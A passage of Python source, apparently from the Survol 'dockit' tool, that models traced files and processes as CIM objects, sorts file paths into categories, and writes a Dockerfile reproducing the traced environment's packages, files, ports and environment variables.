# string Extension;
# string FileName;
# uint64 FileSize;
# string FileType;
# string FSCreationClassName;
# string FSName;
# boolean Hidden;
# uint64 InUseCount;
# datetime LastAccessed;
# datetime LastModified;
# string Path;
# boolean Readable;
# boolean System;
# boolean Writeable;
# };
class CIM_LogicalFile(CIM_XmlMarshaller):
def __init__(self, path_name):
super(CIM_LogicalFile, self).__init__()
# https://msdn.microsoft.com/en-us/library/aa387236(v=vs.85).aspx
# The Name property is a string representing the inherited name
# that serves as a key of a logical file instance within a file system.
# Full path names should be provided.
# TODO: When the name contains "<" or ">" it cannot be properly displayed in SVG.
# TODO: Also, names like "UNIX:" or "TCP:" should be processed a special way.
self.Name = path_name
# File name without the file name extension. Example: "MyDataFile"
try:
basNa = os.path.basename(path_name)
# There might be several dots, or none.
self.FileName = basNa.split(".")[0]
except:
pass
self.Category = _pathname_to_category(path_name)
self.m_DataFileFileAccesses = []
        # Some information is meaningless because it varies between executions.
if G_SameMachine:
try:
objStat = os.stat(path_name)
except:
objStat = None
if objStat:
self.FileSize = objStat.st_size
self.FileMode = objStat.st_mode
self.Inode = objStat.st_ino
self.DeviceId = objStat.st_dev
self.HardLinksNumber = objStat.st_nlink
self.OwnerUserId = objStat.st_uid
self.OwnerGroupId = objStat.st_gid
self.AccessTime = TimeT_to_DateTime(objStat.st_atime)
self.ModifyTime = TimeT_to_DateTime(objStat.st_mtime)
self.CreationTime = TimeT_to_DateTime(objStat.st_ctime)
try:
# This does not exist on Windows.
self.DeviceType = objStat.st_rdev
except AttributeError:
pass
# This is on Windows only.
# self.UserDefinedFlags = objStat.st_flags
# self.FileCreator = objStat.st_creator
# self.FileType = objStat.st_type
# If this is a connected socket:
# 'TCP:[54.36.162.150:37415->82.45.12.63:63708]'
mtchSock = re.match(r"TCP:\[.*->(.*)\]", path_name)
if mtchSock:
self.SetAddrPort(mtchSock.group(1))
else:
# 'TCPv6:[::ffff:54.36.162.150:21->::ffff:82.45.12.63:63703]'
mtchSock = re.match(r"TCPv6:\[.*->(.*)\]", path_name)
if mtchSock:
self.SetAddrPort(mtchSock.group(1))
cim_ontology_list = ['Name']
# class CIM_DataFile : CIM_LogicalFile
# {
# string Caption;
# string Description;
# datetime InstallDate;
# string Status;
# uint32 AccessMask;
# boolean Archive;
# boolean Compressed;
# string CompressionMethod;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Drive;
# string EightDotThreeFileName;
# boolean Encrypted;
# string EncryptionMethod;
# string Name;
# string Extension;
# string FileName;
# uint64 FileSize;
# string FileType;
# string FSCreationClassName;
# string FSName;
# boolean Hidden;
# uint64 InUseCount;
# datetime LastAccessed;
# datetime LastModified;
# string Path;
# boolean Readable;
# boolean System;
# boolean Writeable;
# string Manufacturer;
# string Version;
# };
class CIM_DataFile(CIM_LogicalFile):
def __init__(self, path_name):
super(CIM_DataFile, self).__init__(path_name)
# This creates a map containing all detected files. This map is indexed
# by an informal file category: DLL, data file etc...
@staticmethod
def SplitFilesByCategory():
mapFiles = G_mapCacheObjects[CIM_DataFile.__name__].items()
# TODO: Find a way to define the presentation as a parameter.
# Maybe we can use the list of keys: Just mentioning a property
# means that a sub-level must be displayed.
mapOfFilesMap = {rgxTuple[0]: {} for rgxTuple in G_lstFilters}
# objPath = 'CIM_DataFile.Name="/usr/lib64/libcap.so.2.24"'
for objPath, objInstance in mapFiles:
mapOfFilesMap[objInstance.Category][objPath] = objInstance
return mapOfFilesMap
@classmethod
def DisplaySummary(cls, fdSummaryFile, cimKeyValuePairs):
fdSummaryFile.write("Files:\n")
mapOfFilesMap = CIM_DataFile.SplitFilesByCategory()
try:
filterCats = cimKeyValuePairs["Category"]
except KeyError:
filterCats = None
for categoryFiles, mapFilesSub in sorted(mapOfFilesMap.items()):
            if filterCats and (not categoryFiles in filterCats): continue
            fdSummaryFile.write("\n** %s\n" % categoryFiles)
for objPath, objInstance in sorted(mapFilesSub.items()):
# sys.stdout.write("Path=%s\n"%objPath)
objInstance.Summarize(fdSummaryFile)
fdSummaryFile.write("\n")
m_attributes_priorities = ["Name", "Category", "SocketAddress"]
def XMLDisplay(self, strm):
margin = " "
strm.write("%s<CIM_DataFile Name='%s'>\n" % (margin, self.Name))
subMargin = margin + " "
self.PlainToXML(strm, subMargin)
FileAccess.serialize_list_to_XML(strm, self.m_DataFileFileAccesses, subMargin, True)
strm.write("%s</CIM_DataFile>\n" % (margin))
@staticmethod
def XMLCategorySummary(fdSummaryFile, mapFilesSub):
for objPath, objInstance in sorted(mapFilesSub.items()):
# sys.stdout.write("Path=%s\n"%objPath)
objInstance.XMLDisplay(fdSummaryFile)
@classmethod
def XMLSummary(cls, fd_summary_file, cimKeyValuePairs):
"""Top-level informations are categories of CIM_DataFile which are not technical
but the regex-based filtering."""
mapOfFilesMap = CIM_DataFile.SplitFilesByCategory()
try:
filterCats = cimKeyValuePairs["Category"]
except KeyError:
filterCats = None
for categoryFiles, mapFilesSub in sorted(mapOfFilesMap.items()):
if len(mapFilesSub) == 0:
# No need to write a category name if it is empty.
continue
            if filterCats and (not categoryFiles in filterCats): continue
            fd_summary_file.write(" <FilesCategory category='%s'>\n" % categoryFiles)
CIM_DataFile.XMLCategorySummary(fd_summary_file, mapFilesSub)
fd_summary_file.write(" </FilesCategory>\n")
def Summarize(self, strm):
try:
# By default, this attribute is not set.
if self.IsExecuted:
return
except AttributeError:
pass
strm.write("Path:%s\n" % self.Name)
for filAcc in self.m_DataFileFileAccesses:
if filAcc.OpenTime:
strOpen = _timestamp_to_str(filAcc.OpenTime)
strm.write(" Open:%s\n" % strOpen)
try:
strm.write(" Open times:%d\n" % filAcc.NumOpen)
except AttributeError:
pass
if filAcc.CloseTime:
strClose = _timestamp_to_str(filAcc.CloseTime)
strm.write(" Close:%s\n" % strClose)
# Only if this is a socket.
# The original socket parameters might have been passed as a dict like:
# "connect(6<UNIX:[587259]>, {sa_family=AF_LOCAL, sun_path="/var/run/nscd/socket"}, 110)"
# But it might have been truncated like:
# "['st_mode=S_IFREG|0644', 'st_size=121043', '...']"
# So we are only sure that it is an array.
try:
for saKeyValue in self.SocketAddress:
strm.write(" %s\n" % saKeyValue)
except AttributeError:
pass
def set_is_executed(self):
self.IsExecuted = True
# The input could be IPV4 or IPV6:
# '82.45.12.63:63708]'
# '::ffff:82.45.12.63:63703]'
def SetAddrPort(self, pathIP):
ixEq = pathIP.rfind(":")
if ixEq < 0:
self.Destination = pathIP
else:
self.Port = pathIP[ixEq + 1:]
addrIP = pathIP[:ixEq]
try:
self.Destination = socket.gethostbyaddr(addrIP)[0]
except:
self.Destination = addrIP
@staticmethod
def GetExposedPorts():
"""this is is the list of all ports numbers whihc have to be open."""
mapFiles = G_mapCacheObjects[CIM_DataFile.__name__].items()
setPorts = set()
for objPath, objInstance in mapFiles:
try:
setPorts.add(objInstance.Port)
except AttributeError:
pass
return setPorts
m_nonFilePrefixes = ["UNIX:", "TCP:", "TCPv6:", "NETLINK:", "pipe:", "UDP:", "UDPv6:", ]
def is_plain_file(self):
if self.Name:
for pfx in CIM_DataFile.m_nonFilePrefixes:
if self.Name.startswith(pfx):
return False
return True
return False
# class CIM_Directory : CIM_LogicalFile
# {
# uint32 AccessMask;
# boolean Archive;
# string Caption;
# boolean Compressed;
# string CompressionMethod;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Description;
# string Drive;
# string EightDotThreeFileName;
# boolean Encrypted;
# string EncryptionMethod;
# string Extension;
# string FileName;
# uint64 FileSize;
# string FileType;
# string FSCreationClassName;
# string FSName;
# boolean Hidden;
# datetime InstallDate;
# uint64 InUseCount;
# datetime LastAccessed;
# datetime LastModified;
# string Name;
# string Path;
# boolean Readable;
# string Status;
# boolean System;
# boolean Writeable;
# };
class CIM_Directory(CIM_LogicalFile):
def __init__(self, path_name):
super(CIM_Directory, self).__init__(path_name)
# This must appear AFTER the declaration of classes.
_class_name_to_subclass = {cls.__name__: cls for cls in leaf_derived_classes(CIM_XmlMarshaller)}
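# Small, hedged illustration of the marshalling helpers above (never invoked in
# this module): moniker keys and generic instantiation from a class name.
def _example_cim_marshalling():
    # Moniker keys are built from the ontology attributes, in their declared order.
    assert CIM_DataFile.CreateMonikerKey(u"/tmp/a.txt") == 'CIM_DataFile.Name="/tmp/a.txt"'
    # A leaf CIM class can be instantiated generically from its class name.
    data_file = CIM_XmlMarshaller.create_instance_from_class_name("CIM_DataFile", Name=u"/tmp/a.txt")
    assert data_file.get_survol_moniker() == ("CIM_DataFile", {"Name": u"/tmp/a.txt"})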
# os.path.abspath removes things like . and .. from the path
# giving a full path from the root of the directory tree to the named file (or symlink)
def to_real_absolute_path(directory_path, file_basename):
# This conversion to avoid "TypeError: Can't mix strings and bytes in path components"
if isinstance(directory_path, six.binary_type):
directory_path = directory_path.decode("utf-8")
if isinstance(file_basename, six.binary_type):
file_basename = file_basename.decode("utf-8")
# This does not apply to pseudo-files such as: "pipe:", "TCPv6:" etc...
# It must not filter Windows paths such as "C:\\xxxxx"
if is_platform_linux and re.match(u"^[0-9a-zA-Z_]+:", file_basename):
return file_basename
if file_basename in [u"stdout", u"stdin", u"stderr"]:
return file_basename
join_path = os.path.join(directory_path, file_basename)
norm_path = os.path.realpath(join_path)
if not is_platform_linux:
norm_path = norm_path.replace(u"\\", "/")
return norm_path
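# Quick, hedged illustration of to_real_absolute_path (never called here).
# Exact results depend on the platform and on symbolic links, hence no asserts.
def _example_to_real_absolute_path():
    # Pseudo-files and the standard streams are returned unchanged (on Linux).
    pseudo_file = to_real_absolute_path(u"/home/user", u"pipe:[12345]")
    std_stream = to_real_absolute_path(u"/home/user", u"stdout")
    # Relative names are joined with the directory and normalised,
    # typically "/home/user/../etc/hosts" becomes "/etc/hosts".
    normalised = to_real_absolute_path(u"/home/user", u"../etc/hosts")
    return pseudo_file, std_stream, normalised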
################################################################################
# This contains all CIM objects: CIM_Process, CIM_DataFile etc...
# and is used to generate the summary. Each time an object is created,
# updated or deleted, an event might be sent to a Survol server.
G_mapCacheObjects = None
# Read from a real process or from the log file name when replaying a session.
# It is conceptually part of an ObjectsContext.
G_topProcessId = None
################################################################################
# This helps creating CIM objects based on their class name a key-value pairs
# defined from the ontology. The role of this context object is to contain
# everything which is needed to create a CIM object without ambiguity.
# For example, when creating a CIM_DataFile, only the relative path name
# might be available. So, the process current working directory is given by this context.
class ObjectsContext:
def __init__(self, process_id = None):
self._process_id = process_id
def attributes_to_cim_object(self, cim_class_name, **cim_attributes_dict):
if cim_class_name == "CIM_Process":
cim_key_handle = cim_attributes_dict['Handle']
sys.stderr.write("attributes_to_cim_object CIM_Process cim_key_handle=%s self._process_id=%s\n"
% (cim_key_handle, self._process_id))
return self.ToObjectPath_CIM_Process(cim_key_handle)
if cim_class_name == "CIM_DataFile":
file_pathname = cim_attributes_dict['Name']
return self.ToObjectPath_CIM_DataFile(file_pathname)
# In the general case, reorder the arguments.
cim_object_datafile = CIM_XmlMarshaller.create_instance_from_class_name(cim_class_name, **cim_attributes_dict)
return cim_object_datafile
def ToObjectPath_CIM_Process(self, process_id):
returned_object = self._class_model_to_object_path(CIM_Process, process_id)
map_procs = G_mapCacheObjects[CIM_Process.__name__]
#sys.stderr.write("map_procs.keys()=%s\n" % str(map_procs.keys()))
if process_id != self._process_id:
context_process_obj_path = CIM_Process.CreateMonikerKey(self._process_id)
sys.stderr.write("context_process_obj_path=%s\n" % context_process_obj_path)
parent_proc_obj = map_procs[context_process_obj_path]
returned_object.SetParentProcess(parent_proc_obj)
return returned_object
# It might be a Linux socket or an IP socket.
# The pid can be added so we know which process accesses this file.
def ToObjectPath_CIM_DataFile(self, pathName):
if isinstance(pathName, six.binary_type):
pathName = pathName.decode("utf-8")
assert isinstance(pathName, six.text_type)
if self._process_id:
# Maybe this is a relative file, and to make it absolute,
# the process is needed.
objProcess = self.ToObjectPath_CIM_Process(self._process_id)
dirPath = objProcess.GetProcessCurrentDir()
else:
# At least it will suppress ".." etc...
dirPath = ""
pathName = to_real_absolute_path(dirPath, pathName)
objDataFile = self._class_model_to_object_path(CIM_DataFile, pathName)
return objDataFile
def _class_model_to_object_path(self, class_model, *ctor_args):
global G_mapCacheObjects
map_objs = G_mapCacheObjects[class_model.__name__]
obj_path = class_model.CreateMonikerKey(*ctor_args)
try:
the_obj = map_objs[obj_path]
except KeyError:
if class_model.__name__ == "CIM_Process":
# FIXME: IT IS CALLED TOO OFTEN, FOR EACH CIM_DataFile !!
sys.stderr.write("_class_model_to_object_path %s CIM_Process args=%s\n" % (sys._getframe(1).f_code.co_name, str(*ctor_args)))
the_obj = class_model(*ctor_args)
map_objs[obj_path] = the_obj
return the_obj
################################################################################
def generate_dockerfile(dockerFilename):
fdDockerFile = open(dockerFilename, "w")
    # This writes into the Dockerfile the environment variables accessed
    # by processes. For the moment, all env vars are mixed together,
    # which is, strictly speaking, inexact.
def _write_environment_variables():
for envNam in G_EnvironmentVariables:
envVal = G_EnvironmentVariables[envNam]
if envVal == "":
# Error response from daemon: ENV must have two arguments
envVal = '""'
fdDockerFile.write("ENV %s %s\n" % (envNam, envVal))
fdDockerFile.write("\n")
def _write_process_tree():
"""Only for documentation purpose"""
def WriteOneProcessSubTree(objProc, depth):
commandLine = objProc.GetCommandLine()
if not commandLine:
commandLine = "????"
fdDockerFile.write("# %s -> %s : %s %s\n" % (
_timestamp_to_str(objProc.CreationDate), _timestamp_to_str(objProc.TerminationDate), " " * depth, commandLine))
for subProc in sorted(objProc.m_subProcesses, key=lambda x: x.Handle):
WriteOneProcessSubTree(subProc, depth + 1)
fdDockerFile.write("# Processes tree\n")
procsTopLevel = CIM_Process.GetTopProcesses()
for oneProc in sorted(procsTopLevel, key=lambda x: x.Handle):
WriteOneProcessSubTree(oneProc, 1)
fdDockerFile.write("\n")
currNow = datetime.datetime.now()
currDatTim = currNow.strftime("%Y-%m-%d %H:%M:%S:%f")
fdDockerFile.write("# Dockerfile generated %s\n" % currDatTim)
dockerDirectory = os.path.dirname(dockerFilename)
fdDockerFile.write("# Directory %s\n" % dockerDirectory)
fdDockerFile.write("\n")
fdDockerFile.write("FROM docker.io/fedora\n")
fdDockerFile.write("\n")
fdDockerFile.write("MAINTAINER contact@primhillcomputers.com\n")
fdDockerFile.write("\n")
GenerateDockerProcessDependencies(dockerDirectory, fdDockerFile)
# Top-level processes, which starts the other ones.
# Probably there should be one only, but this is not a constraint.
procsTopLevel = CIM_Process.GetTopProcesses()
for oneProc in procsTopLevel:
# TODO: Possibly add the command "VOLUME" ?
currDir = oneProc.GetProcessCurrentDir()
fdDockerFile.write("WORKDIR %s\n" % currDir)
commandList = oneProc.GetCommandList()
if commandList:
# If the string length read by ltrace or strace is too short,
# some arguments are truncated: 'CMD ["python TestProgs/big_mysql_..."]'
# There should be one CMD command only !
strCmd = ",".join('"%s"' % wrd for wrd in commandList)
fdDockerFile.write("CMD [ %s ]\n" % strCmd)
fdDockerFile.write("\n")
portsList = CIM_DataFile.GetExposedPorts()
if portsList:
fdDockerFile.write("# Port numbers:\n")
for onePort in portsList:
try:
txtPort = socket.getservbyport(int(onePort))
fdDockerFile.write("# Service: %s\n" % txtPort)
except:
fdDockerFile.write("# Unknown service number: %s\n" % onePort)
fdDockerFile.write("EXPOSE %s\n" % onePort)
fdDockerFile.write("\n")
_write_environment_variables()
_write_process_tree()
# More examples here:
# https://github.com/kstaken/dockerfile-examples/blob/master/couchdb/Dockerfile
fdDockerFile.close()
return
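# For orientation, a Dockerfile generated by generate_dockerfile() has roughly
# this shape (the actual content depends on the traced session; all values
# below are made up for the example):
#
#   # Dockerfile generated 2020-01-01 12:00:00:000000
#   # Directory /tmp/dockit_output
#   FROM docker.io/fedora
#   MAINTAINER contact@primhillcomputers.com
#   ... lines written by GenerateDockerProcessDependencies() ...
#   WORKDIR /home/user
#   CMD [ "python","TestProgs/my_program.py" ]
#   # Port numbers:
#   EXPOSE 8080
#   ENV HOME /home/user
#   # Processes tree
#   # 2020-01-01 10:00:00.000000 -> 2020-01-01 10:00:05.000000 :  python TestProgs/my_program.py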
# Environment variables actually accessed by processes.
# Used to generate a Dockerfile.
# As read from the strace or ltrace calls to getenv()
G_EnvironmentVariables = None
def init_global_objects():
global G_mapCacheObjects
global G_httpClient
global G_EnvironmentVariables
G_mapCacheObjects = collections.defaultdict(dict)
# This object is used to send triples to a Survol server.
# It is also used to store the triples in a RDF file, which is created by the destructor.
G_httpClient = HttpTriplesClient()
# As read from the strace or ltrace calls to getenv()
G_EnvironmentVariables = {}
objects_context = ObjectsContext(os.getpid())
objects_context._class_model_to_object_path(CIM_ComputerSystem, socket.gethostname())
objects_context._class_model_to_object_path(CIM_OperatingSystem)
objects_context._class_model_to_object_path(CIM_NetworkAdapter, socket.gethostbyname(socket.gethostname()))
def exit_global_objects():
# It is also used to store the triples in a RDF file, which is created by the destructor.
global G_httpClient
# Flushes the data to a file or possibly a Survol agent.
G_httpClient.http_client_shutdown()
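# Hedged end-to-end sketch (defined only for illustration, never invoked here):
# how the helpers above are typically wired together by the dockit scripts.
# The file name and the timestamps are assumptions made up for the example;
# G_Today is set because the XML/text summaries need it to format timestamps.
def _example_objects_context_usage():
    global G_Today
    init_global_objects()
    G_Today = datetime.date.today().strftime("%Y-%m-%d")
    objects_context = ObjectsContext(os.getpid())
    proc_obj = objects_context.ToObjectPath_CIM_Process(os.getpid())
    file_obj = objects_context.ToObjectPath_CIM_DataFile(u"/tmp/example_data.txt")
    file_access = proc_obj.get_file_access(file_obj)
    file_access.SetOpenTime("12:34:56.000000")
    file_access.set_read_bytes_number(42, None)
    file_access.SetCloseTime("12:34:57.000000")
    exit_global_objects()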
# This is not a map, it is not sorted.
# It contains regular expression for classifying file names in categories:
# Shared libraries, source files, scripts, Linux pipes etc...
G_lstFilters = [
("Shared libraries", [
r"^/usr/lib[^/]*/.*\.so",
r"^/usr/lib[^/]*/.*\.so\..*",
r"^/var/lib[^/]*/.*\.so",
r"^/lib/.*\.so",
r"^/lib64/.*\.so",
]),
("System config files", [
"^/etc/",
"^/usr/share/fonts/",
"^/usr/share/fontconfig/",
"^/usr/share/fontconfig/",
"^/usr/share/locale/",
"^/usr/share/zoneinfo/",
]),
("Other libraries", [
"^/usr/share/",
"^/usr/lib[^/]*/",
"^/var/lib[^/]*/",
]),
("System executables", [
"^/bin/",
"^/usr/bin[^/]*/",
]),
("Kernel file systems", [
"^/proc",
"^/run",
]),
("Temporary files", [
"^/tmp/",
"^/var/log/",
"^/var/cache/",
]),
("Pipes and terminals", [
"^/sys",
"^/dev",
"^pipe:",
"^socket:",
"^UNIX:",
"^NETLINK:",
]),
# TCP:[54.36.162.150:41039->82.45.12.63:63711]
("Connected TCP sockets", [
r"^TCP:\[.*->.*\]",
r"^TCPv6:\[.*->.*\]",
]),
("Other TCP/IP sockets", [
"^TCP:",
"^TCPv6:",
"^UDP:",
"^UDPv6:",
]),
("Others", []),
]
def _pathname_to_category(pathName):
"""This match the path name againt the set of regular expressions
defining broad categories of files: Sockets, libraries, temporary files...
These categories are not technical but based on application best practices,
rules of thumbs etc..."""
for rgxTuple in G_lstFilters:
for oneRgx in rgxTuple[1]:
# If the file matches a regular expression,
# then it is classified in this category.
mtchRgx = re.match( oneRgx, pathName )
if mtchRgx:
return rgxTuple[0]
return "Others"
################################################################################
# See https://github.com/nbeaver/pip_file_lookup
pythonCache = {}
def PathToPythonModuleOneFileMakeCache(path):
global pythonCache
try:
import lib_python
pipInstalledDistributions = lib_python.PipGetInstalledDistributions()
        if pipInstalledDistributions is None:
return
except ImportError:
return
for dist in pipInstalledDistributions:
        # RECORDs should be part of .dist-info metadata
if dist.has_metadata('RECORD'):
lines = dist.get_metadata_lines('RECORD')
paths = [l.split(',')[0] for l in lines]
distDirectory = dist.location
# Otherwise use pip's log for .egg-info's
elif dist.has_metadata('installed-files.txt'):
paths = dist.get_metadata_lines('installed-files.txt')
distDirectory = dist.egg_info
else:
distDirectory = None
if distDirectory:
for p in paths:
normedPath = os.path.normpath( os.path.join(distDirectory, p) )
try:
pythonCache[normedPath].append( dist )
except KeyError:
pythonCache[normedPath] = [ dist ]
def PathToPythonModuleOneFile(path):
try:
return pythonCache[path]
except KeyError:
return []
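# Usage sketch (illustrative, not part of the original module): the cache above must
# be built once before lookups; note that the path argument of
# PathToPythonModuleOneFileMakeCache is currently unused, and the sample path below
# is hypothetical. Lookups return the pip distributions owning the file, or [].
def _example_python_module_lookup():
    PathToPythonModuleOneFileMakeCache(None)
    return PathToPythonModuleOneFile("/usr/lib/python2.7/site-packages/six.py")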
def PathToPythonModuleOneFile_OldOldOldOld(path):
try:
import lib_python
pipInstalledDistributions = lib_python.PipGetInstalledDistributions()
        if pipInstalledDistributions is None:
return
except ImportError:
return
for dist in pipInstalledDistributions:
        # RECORDs should be part of .dist-info metadata
if dist.has_metadata('RECORD'):
lines = dist.get_metadata_lines('RECORD')
paths = [l.split(',')[0] for l in lines]
distDirectory = dist.location
# Otherwise use pip's log for .egg-info's
elif dist.has_metadata('installed-files.txt'):
paths = dist.get_metadata_lines('installed-files.txt')
distDirectory = dist.egg_info
else:
distDirectory = None
if distDirectory:
if path in [ os.path.normpath( os.path.join(distDirectory, p) ) for p in paths]:
yield dist
# This takes as input a list of files, some of them installed by Python modules,
# and others having nothing to do with Python. It returns two data structures:
# - The set of unique Python modules that some of the files come from.
# - The remaining list of files, which do not come from any Python module.
# This makes it possible to reproduce an environment.
def _files_to_python_modules(unpackagedDataFiles):
setPythonModules = set()
unknownDataFiles = []
for oneFilObj in unpackagedDataFiles:
lstModules = PathToPythonModuleOneFile(oneFilObj.Name)
# TODO: Maybe just take one module ?
# sys.stdout.write("path=%s mods=%s\n"%(oneFilObj.Name, str(list(lstModules))))
addedOne = False
for oneMod in lstModules:
setPythonModules.add( oneMod )
addedOne = True
if not addedOne:
unknownDataFiles.append( oneFilObj )
return setPythonModules, unknownDataFiles
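# Call-pattern sketch (illustrative): the input objects only need a Name attribute,
# as CIM_DataFile instances have.
#   setPythonModules, unknownDataFiles = _files_to_python_modules(accessedDataFiles)
#   # setPythonModules : pip distributions to install in the image ("RUN pip install ...")
#   # unknownDataFiles : files which must be copied into the image with "ADD"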
################################################################################
# Writes the dependencies of the processes.
# They might require the installation of libraries, modules etc...
# Sometimes these dependencies are the same.
# The type of process can be "Binary", "Python", "Perl" etc...
# and each of these receives a list of strings, each of which models
# a dependency: an RPM package, a Python module etc...
# Sometimes they can be similar and will therefore be loaded only once.
# Each type of process contains some specific code which can generate
# the Dockerfile commands for handling these dependencies.
#
def GenerateDockerProcessDependencies(dockerDirectory, fdDockerFile):
# TODO: Do not duplicate Python modules installation.
def InstallPipModule(fdDockerFile, namePyModule):
fdDockerFile.write("RUN pip --disable-pip-version-check install %s\n" % namePyModule)
def InstallLinuxPackage(fdDockerFile, packageName):
# packageName = "mariadb-libs-10.1.30-2.fc26.x86_64"
# RUN yum install mariadb-libs
if packageName in InstallLinuxPackage.InstalledPackages:
pckShort = InstallLinuxPackage.InstalledPackages[packageName]
fdDockerFile.write("# Already installed %s -> %s\n" % (pckShort, packageName))
return
# TODO: Maybe there are several versions of the same package.
mtch = re.search(r'(.*)-(.*)-(.*?)\.(.*)', packageName)
if mtch:
(pckShort, version, release, platform) = mtch.groups()
else:
pckShort = packageName
InstallLinuxPackage.InstalledPackages[packageName] = pckShort
# Step 4/7 : RUN yum -y install coreutils # coreutils-8.27-5.fc26.x86_64
# Problem: problem with installed package coreutils-single-8.29-5.fc28.x86_64
# - package coreutils-8.29-5.fc28.x86_64 conflicts with coreutils-single provided by coreutils-single-8.29-5.fc28.x86_64
# (try to add '--allowerasing' to command line to replace conflicting packages or '--skip-broken' to skip uninstallable packages)
# For the moment, this is simpler.
if pckShort in ['coreutils']:
fdDockerFile.write("# Potential conflict with %s , %s\n" % (pckShort, packageName))
else:
fdDockerFile.write("RUN yum -y install %s # %s\n" % (pckShort, packageName))
# Each package is installed only once.
InstallLinuxPackage.InstalledPackages = dict()
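    # Example of the package-name split done by InstallLinuxPackage (illustrative):
    #   "mariadb-libs-10.1.30-2.fc26.x86_64"
    #   -> pckShort="mariadb-libs", version="10.1.30", release="2", platform="fc26.x86_64"
    # which produces the line:
    #   RUN yum -y install mariadb-libs # mariadb-libs-10.1.30-2.fc26.x86_64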
# FIXME: We could copy an entire directory tree. When ?
def AddToDockerDir(pathName, filComment=0):
# Maybe the input file does not exist.
if not os.path.exists(pathName):
fdDockerFile.write("# Origin file does not exist:%s\n" % (pathName))
return
# No need to copy directories.
if os.path.isdir(pathName):
return
orgDir = os.path.dirname(pathName)
dstDir = dockerDirectory + "/" + orgDir
if not os.path.exists(dstDir):
os.makedirs(dstDir)
dstPath = dockerDirectory + "/" + pathName
try:
# Copy the file at the right place, so "docker build" can find it.
shutil.copy(pathName, dstPath)
except IOError:
sys.stdout.write("Failed copy %s to %s\n" % (pathName, dstPath))
# Maybe the file is not there because this is in replay mode,
            # rerunning a session from the log file. This is not a problem.
fdDockerFile.write("# Cannot add non-existent file:%s\n" % (pathName))
return
if filComment:
fdDockerFile.write("# %s\n" % (filComment))
fdDockerFile.write("ADD %s %s\n" % (pathName, pathName))
    # Code dependencies and data file dependencies are different.
    # All versions are mixed together, which is realistic most of the time.
class Dependency(object):
def __init__(self):
self.m_accessedCodeFiles = set()
def AddDep(self, pathName):
self.m_accessedCodeFiles.add(pathName)
class DependencyPython(Dependency):
DependencyName = "Python scripts"
def __init__(self):
super(DependencyPython, self).__init__()
@staticmethod
def is_dependency_of(objInstance):
try:
# Detection with strace:
# execve("/usr/bin/python", ["python", "TestProgs/mineit_mys"...], [/* 22 vars */]) = 0
# Detection with ltrace:
# __libc_start_main([ "python", "TestProgs/mineit_mysql_select.py" ] <unfinished ...>
return objInstance.Executable.find("/python") >= 0 or objInstance.Executable.startswith("python")
except AttributeError:
# We do not know the executable, or it is a thread.
return False
@staticmethod
def is_executable_file(objDataFile):
for file_extension in [".py", ".pyc", ".pyd"]:
if objDataFile.Name.endswith(file_extension):
return True
return False
def generate_docker_dependencies(self, fdDockerFile):
# FIXME: TODO: Remove these hardcodes.
packagesToInstall = set()
for objDataFile in self.m_accessedCodeFiles:
filNam = objDataFile.Name
if filNam.find("packages") >= 0:
                    # Now this truncates the file name to extract the Python package name.
# filNam = '/usr/lib64/python2.7/site-packages/MySQLdb/constants/CLIENT.pyc'
splitFil = filNam.split("/")
try:
ixPack = splitFil.index("site-packages")
except ValueError:
try:
ixPack = splitFil.index("dist-packages")
except ValueError:
ixPack = -1
pass
if (ixPack >= 0) and (ixPack < len(splitFil) - 1):
pckNam = splitFil[ixPack + 1]
if not pckNam.endswith(".py") and not pckNam.endswith(".pyc"):
# filNam = 'abrt_exception_handler.py'
packagesToInstall.add(splitFil[ixPack + 1])
elif filNam.startswith("/usr/lib/python2.7/"):
# Then a source file coming with Python: "/usr/lib/python2.7/string.py"
pass
else:
                    # Must avoid copying files which belong to the standard installation and are always available, such as:
# "ADD /usr/lib64/python2.7/cgitb.py /"
# TODO: Use the right path:
if not filNam.startswith("/usr/lib64/python2.7"):
AddToDockerDir(filNam)
if packagesToInstall or self.m_accessedCodeFiles:
InstallLinuxPackage(fdDockerFile, "python")
for onePckgNam in sorted(packagesToInstall):
# TODO: Do not duplicate Python modules installation.
InstallPipModule(fdDockerFile, onePckgNam)
class DependencyPerl(Dependency):
DependencyName = "Perl scripts"
def __init__(self):
super(DependencyPerl, self).__init__()
@staticmethod
def is_dependency_of(objInstance):
try:
return objInstance.Executable.find("/perl") >= 0
except AttributeError:
# We do not know the executable, or it is a thread.
return False
@staticmethod
def is_executable_file(objDataFile):
return objDataFile.Name.endswith(".pl")
def generate_docker_dependencies(self, fdDockerFile):
for objDataFile in self.m_accessedCodeFiles:
filNam = objDataFile.Name
fdDockerFile.write("RUN cpanm %s\n" % filNam)
pass
class DependencyBinary(Dependency):
DependencyName = "Binary programs"
def __init__(self):
super(DependencyBinary, self).__init__()
@staticmethod
def is_dependency_of(objInstance):
# Always true because tested at the end as a default.
# The executable should at least be an executable file.
return True
@staticmethod
def is_executable_file(objDataFile):
return objDataFile.Name.find(".so") > 0
@staticmethod
# This detects the libraries which are always in the path.
#
def IsSystemLib(filNam):
basNam = os.path.basename(filNam)
if basNam in ["ld.so.cache", "ld.so.preload"]:
return True
# Eliminates the extension and the version.
noExt = basNam[: basNam.find(".")]
noExt = noExt[: noExt.find("-")]
if noExt in ["libdl", "libc", "libacl", "libm", "libutil", "libpthread"]:
return True
return False
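        # Illustrative behaviour of IsSystemLib (not part of the original code):
        #   IsSystemLib("/lib64/libc-2.17.so")      -> True  (stripped down to "libc")
        #   IsSystemLib("/etc/ld.so.cache")         -> True  (listed explicitly)
        #   IsSystemLib("/usr/lib64/libssl.so.1.1") -> False (not a baseline library)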
def generate_docker_dependencies(self, fdDockerFile):
lstAccessedPackages, unpackagedAccessedCodeFiles = G_FilesToPackagesCache.get_packages_list(
self.m_accessedCodeFiles)
fdDockerFile.write("# Package installations:\n")
for namPackage in sorted(lstAccessedPackages):
InstallLinuxPackage(fdDockerFile, namPackage)
fdDockerFile.write("\n")
fdDockerFile.write("# Non-packaged executable files copies:\n")
sortAccessedCodeFiles = sorted(unpackagedAccessedCodeFiles, key=lambda x: x.Name)
for objDataFile in sortAccessedCodeFiles:
filNam = objDataFile.Name
AddToDockerDir(filNam)
_dependencies_list = [
DependencyPython(),
DependencyPerl(),
DependencyBinary(),
]
accessedDataFiles = set()
# This is the complete list of extra executables which have to be installed.
lstBinaryExecutables = set()
# This is a subset of _dependencies_list.
setUsefulDependencies = set()
for objPath, objInstance in G_mapCacheObjects[CIM_Process.__name__].items():
for oneDep in _dependencies_list:
# Based on the executable of the process,
